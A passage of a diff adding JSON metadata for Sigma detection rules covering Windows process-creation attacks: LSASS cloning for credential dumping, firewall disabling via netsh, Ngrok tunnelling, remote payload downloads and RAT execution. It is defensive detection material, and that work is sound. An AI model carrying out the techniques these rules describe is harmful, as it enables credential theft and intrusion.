[ + "attack.execution" + ] + }, + "uuid": "d65aee4d-2292-4cea-b832-83accd6cfa43", + "value": "Execute Arbitrary Binaries Using GUP Utility" + }, + { + "description": "Use of hostname to get information", + "meta": { + "author": "frack113", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_hostname.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-6---hostname-discovery-windows", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/hostname", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_hostname.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1082" + ] + }, + "uuid": "7be5fb68-f9ef-476d-8b51-0256ebece19e", + "value": "Suspicious Execution of Hostname" + }, + { + "description": "Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors", + "meta": { + "author": "Florian Roth (rule), Microsoft (idea)", + "creation_date": "2022/08/04", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_susp_iis_module_registration.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_iis_module_registration.yml" + ], + "tags": "No established tags" + }, + "uuid": "043c4b8b-3a54-4780-9682-081cb6b8185c", + "value": "Suspicious IIS Module Registration" + }, + { + "description": "Checks whether the image specified in a process creation event is not a full, absolute path (caused by 
process ghosting or other unorthodox methods to start a process)", + "meta": { + "author": "Max Altgelt", + "creation_date": "2021/12/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_image_missing.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://pentestlaboratories.com/2021/12/08/process-ghosting/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_image_missing.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "71158e3f-df67-472b-930e-7d287acaa3e1", + "value": "Execution Of Non-Existing File" + }, + { + "description": "Uses the .NET InstallUtil.exe application in order to execute image without log", + "meta": { + "author": "frack113", + "creation_date": "2022/01/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_instalutil.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/", + "https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_instalutil.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "d042284c-a296-4988-9be5-f424fadcc28c", + "value": "Suspicious Execution of InstallUtil Without Log" + }, + { + "description": "Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_invoke_webrequest_download.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_invoke_webrequest_download.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", + "value": "Suspicious Invoke-WebRequest Usage" + }, + { + "description": "Detects suspicious IIS native-code module installations via command line", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/12/11", + "falsepositive": [ + "Unknown as it may vary from organisation to organisation how admins use to install IIS modules" + ], + "filename": "proc_creation_win_susp_iss_module_install.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/", + "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_iss_module_install.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "9465ddf4-f9e4-4ebd-8d98-702df3a93239", + "value": "IIS Native-Code Module Command Line Installation" + }, + { + "description": "Detects the rare use of the command line tool shutdown to logoff a user", + "meta": { + "author": "frack113", + "creation_date": "2022/10/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_logoff.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1529/T1529.md", + 
"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_logoff.yml" + ], + "tags": [ + "attack.impact", + "attack.t1529" + ] + }, + "uuid": "ec290c06-9b6b-4338-8b6b-095c0f284f10", + "value": "Suspicious Execution of Shutdown to Log Out" + }, + { + "description": "Detects Wscript or Cscript executing from a drive other than C. This has been observed with Qakbot executing from within a mounted ISO file.", + "meta": { + "author": "Aaron Herman", + "creation_date": "2022/10/01", + "falsepositive": [ + "Legitimate applications installed on other partitions such as \"D:\"" + ], + "filename": "proc_creation_win_susp_lolbin_non_c_drive.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB_30.09.2022.txt", + "https://app.any.run/tasks/4985c746-601e-401a-9ccf-ae350ac2e887/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lolbin_non_c_drive.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "5b80cf53-3a46-4adc-960b-05ec19348d74", + "value": "Wscript Execution from Non C Drive" + }, + { + "description": "Detects a suspicious LSASS process process clone that could be a sign of process dumping activity", + "meta": { + "author": "Florian Roth, Samir Bousseaden", + "creation_date": "2021/11/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_lsass_clone.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/", + "https://twitter.com/Hexacorn/status/1420053502554951689", + "https://twitter.com/SBousseaden/status/1464566846594691073?s=20", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lsass_clone.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.t1003.001" + ] + }, + "uuid": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", + "value": "Suspicious LSASS Process Clone" + }, + { + "description": "Use of reg to get MachineGuid information", + "meta": { + "author": "frack113", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_machineguid.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-8---windows-machineguid-discovery", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_machineguid.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1082" + ] + }, + "uuid": "f5240972-3938-4e56-8e4b-e33893176c1f", + "value": "Suspicious Query of MachineGUID" + }, + { + "description": "Detects suspicious child processes of the Microsoft OneNote application. 
This may indicate an attempt to execute malicious embedded objects from a .one file.", + "meta": { + "author": "Tim Rauch (rule), Elastic (idea)", + "creation_date": "2022/10/21", + "falsepositive": [ + "File located in the AppData folder with trusted signature" + ], + "filename": "proc_creation_win_susp_microsoft_onenote_child_process.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-e34e43eb5666427602ddf488b2bf3b545bd9aae81af3e6f6c7949f9652abdf18", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_microsoft_onenote_child_process.yml" + ], + "tags": [ + "attack.t1566", + "attack.t1566.001", + "attack.initial_access" + ] + }, + "uuid": "c27515df-97a9-4162-8a60-dc0eeb51b775", + "value": "Suspicious Microsoft OneNote Child Process" + }, + { + "description": "Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.\nThis could be a sign of obfuscation of a fat finger problem (typo by the developer).\n", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_missing_spaces.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/cyb3rops/status/1562072617552678912", + "https://ss64.com/nt/cmd.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_missing_spaces.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "a16980c2-0c56-4de0-9a79-17971979efdd", + "value": "Missing Space Characters in Command Lines" + }, + { + "description": "Detects execution of the \"mofcomp\" utility as a child of a suspicious shell or script running utility 
or by having a supsicious path in the commandline.\nThe \"mofcomp\" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.\nAttackers abuse this utility to install malicious MOF scripts\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_mofcomp_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", + "https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml", + "https://docs.microsoft.com/en-us/windows/win32/wmisdk/mofcomp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mofcomp_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218" + ] + }, + "uuid": "1dd05363-104e-4b4a-b963-196a534b03a1", + "value": "Suspicious Mofcomp Execution" + }, + { + "description": "Detects when when a mounted share is removed. 
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", + "meta": { + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "creation_date": "2020/10/08", + "falsepositive": [ + "Administrators or Power users may remove their shares via cmd line" + ], + "filename": "proc_creation_win_susp_mounted_share_deletion.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mounted_share_deletion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.005" + ] + }, + "uuid": "cb7c4a03-2871-43c0-9bbb-18bbdb079896", + "value": "Mounted Share Deleted" + }, + { + "description": "Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/11", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_mpiexec_lolbin.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mrd0x/status/1465058133303246867", + "https://docs.microsoft.com/en-us/powershell/high-performance-computing/mpiexec?view=hpc19-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mpiexec_lolbin.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "729ce0ea-5d8f-4769-9762-e35de441586d", + "value": "MpiExec Lolbin" + }, + { + "description": "Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process", + "meta": { + "author": "frack113", + "creation_date": "2022/11/17", + 
"falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_msbuild.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/abdf586e-df0c-4d39-89a7-06bf24913401/", + "https://www.echotrail.io/insights/search/msbuild.exe", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_msbuild.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "33be4333-2c6b-44f4-ae28-102cdbde0a31", + "value": "Suspicious Msbuild Execution By Uncommon Parent Process" + }, + { + "description": "Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism", + "meta": { + "author": "Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)", + "creation_date": "2019/02/22", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "filename": "proc_creation_win_susp_mshta_execution.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://blog.sevagas.com/?Hacking-around-HTA-files", + "https://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356", + "https://docs.microsoft.com/en-us/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script", + "https://medium.com/tsscyber/pentesting-and-hta-bypassing-powershell-constrained-language-mode-53a42856c997", + "https://twitter.com/mattifestation/status/1326228491302563846", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mshta_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140", + "attack.t1218.005", + "attack.execution", + "attack.t1059.007", + "cve.2020.1599" + ] + }, + "uuid": "cc7abbd0-762b-41e3-8a26-57ad50d2eea3", + "value": "MSHTA Suspicious Execution 01" + }, + { + "description": "Detects 
suspicious mshta process patterns", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/07/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_mshta_pattern.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://en.wikipedia.org/wiki/HTML_Application", + "https://www.echotrail.io/insights/search/mshta.exe", + "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mshta_pattern.yml" + ], + "tags": [ + "attack.execution", + "attack.t1106" + ] + }, + "uuid": "e32f92d1-523e-49c3-9374-bdb13b46a3ba", + "value": "Suspicious MSHTA Process Patterns" + }, + { + "description": "Detects suspicious command line using the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...)", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/14", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_mshtml_runhtmlapplication.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/n1nj4sec/status/1421190238081277959", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mshtml_runhtmlapplication.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "4782eb5a-a513-4523-a0ac-f3082b26ac5c", + "value": "Mshtml DLL RunHTMLApplication Abuse" + }, + { + "description": "Detects execution of msiexec from an uncommon directory", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/11/14", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_msiexec_cwd.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://twitter.com/200_okay_/status/1194765831911215104", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_msiexec_cwd.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.005" + ] + }, + "uuid": "e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", + "value": "Suspicious MsiExec Directory" + }, + { + "description": "Detects suspicious msiexec process starts with web addresses as parameter", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/02/09", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "filename": "proc_creation_win_susp_msiexec_web_install.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_msiexec_web_install.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.007", + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "f7b5f842-a6af-4da5-9e95-e32478f3cd2f", + "value": "MsiExec Web Install" + }, + { + "description": "Downloads payload from remote server", + "meta": { + "author": "Beyu Denis, oscd.community", + "creation_date": "2019/10/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_msoffice.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/", + "https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191", + "Reegun J (OCBC Bank)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_msoffice.yml" + ], + "tags": [ + 
"attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "0c79148b-118e-472b-bdb7-9b57b444cc19", + "value": "Malicious Payload Download via Office Binaries" + }, + { + "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", + "meta": { + "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "creation_date": "2021/12/07", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_susp_netsh_discovery_command.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-2---list-windows-firewall-rules", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_netsh_discovery_command.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1016" + ] + }, + "uuid": "0e4164da-94bc-450d-a7be-a4b176179f1f", + "value": "Suspicious Netsh Discovery Command" + }, + { + "description": "Detects persitence via netsh helper", + "meta": { + "author": "Victor Sergeev, oscd.community", + "creation_date": "2019/10/25", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_netsh_dll_persistence.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.007/T1546.007.md", + "https://attack.mitre.org/software/S0108/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_netsh_dll_persistence.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1546.007", + "attack.s0108" + ] + }, + "uuid": "56321594-9087-49d9-bf10-524fe8479452", + "value": 
"Suspicious Netsh DLL Persistence" + }, + { + "description": "Detects netsh commands that turns off the Windows firewall", + "meta": { + "author": "Fatih Sirin", + "creation_date": "2019/11/01", + "falsepositive": [ + "Legitimate administration" + ], + "filename": "proc_creation_win_susp_netsh_firewall_disable.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.winhelponline.com/blog/enable-and-disable-windows-firewall-quickly-using-command-line/", + "https://app.any.run/tasks/210244b9-0b6b-4a2c-83a3-04bd3175d017/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-1---disable-microsoft-defender-firewall", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_netsh_firewall_disable.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004", + "attack.s0108" + ] + }, + "uuid": "57c4bf16-227f-4394-8ec7-1b745ee061c3", + "value": "Firewall Disabled via Netsh" + }, + { + "description": "Detects execution of client32.exe (NetSupport RAT) from an unsual location (outisde of 'C:\\Program Files')", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_netsupport_rat_exec_location.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/misbehaving-rats/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_netsupport_rat_exec_location.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "37e8d358-6408-4853-82f4-98333fca7014", + "value": "Execution of NetSupport RAT From Unusual Location" + }, + { + "description": "Adversaries may look for details about the network configuration and settings of 
systems they access or through information discovery of remote systems", + "meta": { + "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "creation_date": "2021/12/07", + "falsepositive": [ + "Administrator, hotline ask to user" + ], + "filename": "proc_creation_win_susp_network_command.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-1---system-network-configuration-discovery-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_network_command.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1016" + ] + }, + "uuid": "a29c1813-ab1f-4dde-b489-330b952e91ae", + "value": "Suspicious Network Command" + }, + { + "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", + "meta": { + "author": "frack113", + "creation_date": "2021/12/10", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_network_listing_connections.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-1---system-network-connections-discovery", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_network_listing_connections.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1049" + ] + }, + "uuid": "1c67a717-32ba-409b-a45d-0fb704a73a81", + "value": "Suspicious Listing of Network Connections" + }, + { + "description": "Detects execution of Net.exe, whether suspicious or benign.", + "meta": { + 
"author": "Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements)", + "creation_date": "2019/01/16", + "falsepositive": [ + "Will need to be tuned. If using Splunk, I recommend | stats count by Computer,CommandLine following the search for easy hunting by computer/CommandLine." + ], + "filename": "proc_creation_win_susp_net_execution.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/", + "https://eqllib.readthedocs.io/en/latest/analytics/4d2e7fc1-af0b-4915-89aa-03d25ba7805e.html", + "https://eqllib.readthedocs.io/en/latest/analytics/e61f557c-a9d0-4c25-ab5b-bbc46bb24deb.html", + "https://eqllib.readthedocs.io/en/latest/analytics/9b3dd402-891c-4c4d-a662-28947168ce61.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-2---system-service-discovery---netexe", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_net_execution.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1007", + "attack.t1049", + "attack.t1018", + "attack.t1135", + "attack.t1201", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1087.001", + "attack.t1087.002", + "attack.lateral_movement", + "attack.t1021.002", + "attack.s0039" + ] + }, + "uuid": "183e7ea8-ac4b-4c23-9aec-b3dac4e401ac", + "value": "Net.exe Execution" + }, + { + "description": "Detects net use command combo which executes files from WebDAV server; seen in malicious LNK files", + "meta": { + "author": "pH-T", + "creation_date": "2022/09/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_net_use.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/ShadowChasing1/status/1552595370961944576", + 
"https://www.virustotal.com/gui/file/a63376ee1dba76361df73338928e528ca5b20171ea74c24581605366dcaa0104/behavior", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_net_use.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "f0507c0f-a3a2-40f5-acc6-7f543c334993", + "value": "Suspicious Net Use Command Combo" + }, + { + "description": "Detects a when net.exe is called with a password in the command line", + "meta": { + "author": "Tim Shelton (HAWK.IO)", + "creation_date": "2021/12/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_net_use_password_plaintext.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_net_use_password_plaintext.yml" + ], + "tags": "No established tags" + }, + "uuid": "d4498716-1d52-438f-8084-4a603157d131", + "value": "Password Provided In Command Line Of Net.exe" + }, + { + "description": "Detects creation of a new service (kernel driver) with the type \"kernel\"", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/14", + "falsepositive": [ + "Rare legitimate installation of kernel drivers via sc.exe" + ], + "filename": "proc_creation_win_susp_new_kernel_driver_via_sc.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_new_kernel_driver_via_sc.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "431a1fdb-4799-4f3b-91c3-a683b003fc49", + "value": "New Kernel Driver Via 
SC.EXE" + }, + { + "description": "Detects creation of a new service via \"sc\" command or the powershell \"new-service\" cmdlet with suspicious binary paths", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/14", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_new_service_creation.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md", + "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_new_service_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8", + "value": "Suspicious New Service Creation" + }, + { + "description": "Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\nInvolved domains are bin.equinox.io for download and *.ngrok.io for connections.\n", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/05/14", + "falsepositive": [ + "Another tool that uses the command line switches of Ngrok", + "Ngrok http 3978 (https://docs.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)" + ], + "filename": "proc_creation_win_susp_ngrok_pua.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://ngrok.com/docs", + "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html", + 
"https://stackoverflow.com/questions/42442320/ssh-tunnel-to-ngrok-and-initiate-rdp", + "https://www.virustotal.com/gui/file/58d21840d915aaf4040ceb89522396124c82f325282f805d1085527e1e2ccfa1/detection", + "https://cybleinc.com/2021/02/15/ngrok-platform-abused-by-hackers-to-deliver-a-new-wave-of-phishing-attacks/", + "https://twitter.com/xorJosh/status/1598646907802451969", + "https://www.softwaretestinghelp.com/how-to-use-ngrok/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ngrok_pua.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1572" + ] + }, + "uuid": "ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", + "value": "Ngrok Usage" + }, + { + "description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", + "meta": { + "author": "frack113", + "creation_date": "2021/12/10", + "falsepositive": [ + "Network administrator computer" + ], + "filename": "proc_creation_win_susp_nmap.yml", + "level": "high", + "logsource.category": "process_creation", + 